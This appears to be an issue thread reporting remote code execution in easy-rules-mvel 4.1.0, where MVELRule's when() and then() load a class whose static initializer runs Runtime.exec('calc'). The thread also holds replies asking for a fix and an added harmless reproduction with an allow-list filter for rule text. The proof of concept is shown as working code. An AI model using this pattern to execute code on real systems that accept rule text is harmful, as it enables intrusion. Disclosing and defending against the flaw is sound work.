easy-rules
MVELRule Remote Code Execution
easy-rules-mvel version: 4.1.0
I have run code like:
import org.jeasy.rules.mvel.MVELRule;
public class Repro {
    public static void main(String[] args) {
        try {
            // then() compiles the MVEL expression at once; resolving "jaz.Zer" loads and initializes the class
            MVELRule result = new MVELRule().then("jaz.Zer");
        } catch (Exception e) {
        }
    }
}
Meanwhile I have a class jaz.Zer on the classpath, whose content is:
package jaz;

import java.io.IOException;

// The static initializer runs as soon as the class is initialized, i.e. when MVEL resolves "jaz.Zer"
public class Zer {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
On the Windows platform, the above code will open my PC's calculator.
Additionally, MVELRule.when also leads to this RCE:
import org.jeasy.rules.mvel.MVELRule;
public class ReproWhen {
    public static void main(String[] args) {
        try {
            // when() also compiles immediately; the "\b" prefix is reproduced exactly as posted
            MVELRule result = new MVELRule().when("\bjaz.Zer");
        } catch (Exception e) {
        }
    }
}
It's a limitation of mvel expression language.
Hi! Do you have an update on this? Is there a workaround or fix for it? I see the vulnerability is still open.
Do we have any workaround to fix the vulnerability?
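The following is an added example, not code from this issue or from the easy-rules project. It assumes the easy-rules-mvel 4.1.0 API shown in the report (org.jeasy.rules.mvel.MVELRule, whose when() and then() compile the MVEL expression immediately); the package probe, the classes Marker and ReproAndGate, and the allow-list gate isAcceptableCondition are assumptions made up for this example. It does two things: it reproduces the report with a static initializer that only records an event (a harmless stand-in for jaz.Zer's Runtime.exec), which shows that the initializer runs during then(), before any rule is fired and without any Facts; and it screens rule text with a conservative allow-list, the kind of defence-in-depth gate that can sit in front of MVELRule when rule text is not fully trusted, rejecting both payloads from the report.

```java
// file: probe/Marker.java
// Harmless stand-in for the jaz.Zer class in the report: its static initializer records
// an event in ReproAndGate.EVENTS instead of spawning a process.
package probe;

public class Marker {
    static {
        ReproAndGate.EVENTS.add("probe.Marker static initializer ran");
    }
}

// file: probe/ReproAndGate.java
package probe;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import org.jeasy.rules.mvel.MVELRule;

public class ReproAndGate {

    static final List<String> EVENTS = new ArrayList<>();

    // Tokens the gate understands: whitespace, string and numeric literals, (dotted) identifiers,
    // comparison/boolean/arithmetic operators and parentheses. Anything else is a rejection.
    private static final Pattern TOKEN = Pattern.compile(
            "\\s+"
            + "|\"(?:[^\"\\\\]|\\\\.)*\""
            + "|'(?:[^'\\\\]|\\\\.)*'"
            + "|\\d+(?:\\.\\d+)?"
            + "|[A-Za-z_][A-Za-z0-9_]*(?:\\.[A-Za-z_][A-Za-z0-9_]*)*"
            + "|==|!=|<=|>=|&&|\\|\\||[-+*/%<>!()]");

    private static final Set<String> LITERAL_WORDS = new HashSet<>(Arrays.asList("true", "false", "null"));

    // Conservative allow-list for condition expressions: every token must be recognised, every
    // identifier must be rooted at a declared fact name, and an identifier followed by '(' (a
    // method or constructor call) is refused. "jaz.Zer" fails the fact check; "\bjaz.Zer" fails
    // because the backspace character is not a recognised token.
    static boolean isAcceptableCondition(String expression, Set<String> factNames) {
        Matcher m = TOKEN.matcher(expression);
        boolean prevIdentifier = false;
        int pos = 0;
        while (pos < expression.length()) {
            if (!m.find(pos) || m.start() != pos) {
                return false;                       // unrecognised character at pos
            }
            String tok = m.group();
            char c = tok.charAt(0);
            if (!Character.isWhitespace(c)) {
                if (c == '(' && prevIdentifier) {
                    return false;                   // looks like a call: person.getClass(...)
                }
                boolean identifier = Character.isLetter(c) || c == '_';
                if (identifier) {
                    int dot = tok.indexOf('.');
                    String root = dot < 0 ? tok : tok.substring(0, dot);
                    if (LITERAL_WORDS.contains(root)) {
                        if (dot >= 0) return false; // no property access on true/false/null
                    } else if (!factNames.contains(root)) {
                        return false;               // identifier is not a declared fact
                    }
                }
                prevIdentifier = identifier;
            }
            pos = m.end();
        }
        return true;
    }

    public static void main(String[] args) {
        Set<String> facts = new HashSet<>(Arrays.asList("person"));

        // Screening constructed rule text before it ever reaches MVEL compilation
        String[] candidates = {
            "person.age >= 18 && person.active == true",  // accepted: rooted at a fact, no calls
            "probe.Marker",                               // rejected: "probe" is not a declared fact
            "\bprobe.Marker",                             // rejected: backspace is not a token
            "person.getClass()",                          // rejected: method call
            "new probe.Marker()"                          // rejected: "new" is not a declared fact
        };
        for (String candidate : candidates) {
            System.out.println(candidate.replace("\b", "\\b") + " -> "
                    + (isAcceptableCondition(candidate, facts) ? "accepted" : "rejected"));
        }

        // Reproduction of the report with the harmless class: no rule is fired and no Facts exist;
        // per the report, MVEL resolves "probe.Marker" while then() compiles the action, so the
        // static initializer has already run when then() returns.
        System.out.println("events before then(): " + EVENTS);
        new MVELRule().then("probe.Marker");
        System.out.println("events after then():  " + EVENTS);
    }
}
```

Run it with easy-rules-mvel 4.1.0 and its MVEL dependency on the classpath. The gate is deliberately narrow (no method calls, no collections, no ternaries, no assignment), so it fits condition expressions over fact properties rather than actions that need to invoke methods; it is a screen, not a sandbox. MVEL expressions are code, and as the maintainer's reply says, the behaviour is MVEL's own: the only robust position is that rule text reaches MVELRule solely from sources trusted as much as the application's source.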